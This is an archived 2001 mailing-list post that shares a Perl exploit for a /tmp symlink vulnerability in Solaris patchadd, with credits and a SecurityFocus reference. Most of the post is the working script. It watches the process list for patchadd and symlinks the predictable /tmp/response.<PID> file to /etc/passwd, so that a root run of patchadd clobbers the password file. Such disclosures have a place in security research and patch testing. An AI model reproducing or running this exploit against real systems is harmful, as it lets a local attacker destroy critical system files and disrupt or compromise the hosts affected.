Here is an exploit to an old bug for patchadd in Solaris. It exploits a symlink vulnerability to clobber files with output from patchadd. This was written and tested on Solaris 2.8 Sparc with the current patch cluster applied. -- Larry http://vapid.dhs.org:8080 <----Begin perl----------------------------------------------------------> #!/usr/local/bin/perl #Exploit for patchadd Solaris 2.x. Symlink /tmp file creation #vulnerability #patchadd creates files in /tmp with mode 644 that can be used to clobber #system files when executed by root. #Larry W. Cashdollar #http://vapid.dhs.org:8080 #See BID http://www.securityfocus.com/bid/2127 #Discovery credit: Jonathan Fortin jfortinat_private #Tested on SunOS smackdown 5.8 Generic_108528-10 sun4u sparc SUNW,Ultra-5_10 use strict; my $NOISY = 1; # Do you want quiet output? my $clobber = "/etc/passwd"; print "Listening for patchadd process...\n" if ($NOISY); while(1) { open (ps,"ps -ef | grep -v grep |grep -v PID |"); while(<ps>) { my @args = (split " ", $_); if (/patch/) { print "Targeting PID $args[1] and symlinking response.$args[1] to $clobber\n" if ($NOISY); symlink($clobber,"/tmp/response.$args[1]"); exit(1); } } } <----end perl---------------------------------------------------------->
This archive was generated by hypermail 2b30 : Mon Aug 27 2001 - 09:33:15 PDT